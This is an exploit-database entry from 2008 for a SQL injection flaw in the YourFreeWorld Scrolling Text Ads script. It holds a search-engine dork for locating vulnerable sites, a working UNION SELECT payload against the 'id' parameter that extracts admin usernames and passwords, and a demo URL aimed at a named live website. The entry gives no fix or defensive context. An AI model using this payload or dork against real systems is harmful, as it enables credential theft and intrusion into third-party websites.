id: 4022
date: 11/01/2008
title: YourFreeWorld Scrolling Text Ads (id) SQL Injection Vulnerability
author: Hussin X
cves: 

=================================================================
YourFreeWorld Scrolling Text Ads (id) SQL Injection Vulnerability
=================================================================


Scrolling Text Ads ( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X
___________________________________

script    : http://www.yourfreeworld.com/script/scrollingads.php

DorK   :  inurl:"tr1.php?id="

Exploit :
_______

tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--



Demo :
_______


http://www.downlinegoldmine.com/scrollingtextads/tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--



#  0day.today [2023-03-24]  #